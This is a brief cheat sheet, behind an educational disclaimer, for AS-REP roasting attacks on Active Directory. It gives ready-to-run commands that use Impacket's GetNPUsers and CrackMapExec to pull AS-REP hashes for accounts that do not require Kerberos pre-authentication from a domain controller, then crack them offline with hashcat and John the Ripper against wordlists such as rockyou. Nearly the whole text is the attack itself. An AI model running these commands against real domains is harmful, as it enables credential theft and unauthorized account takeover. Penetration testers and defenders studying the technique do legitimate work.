Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
USING IMPACKET GETNPUSERS.PY
- Update the package list:
sudo apt-get update
- Install Impacket:
sudo apt-get install python3-impacket
- Enumerate Accounts:
impacket-GetNPUsers -dc-ip [IP_ADDRESS] example.local/ -usersfile users.txt -no-pass -outputfile asrep_hashes.txt
- Crack AS-REP Hashes using Hashcat:
hashcat -m 18200 -a 0 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
- Crack AS-REP Hashes using John the Ripper:
john --format=krb5asrep --wordlist=wordlist.txt asrep_hashes.txt
USING CRACKMAPEXEC
- Enumerate Accounts and Retrieve AS-REP Hashes:
crackmapexec smb [IP_ADDRESS] -u users.txt --asreproast asrep_hashes.txt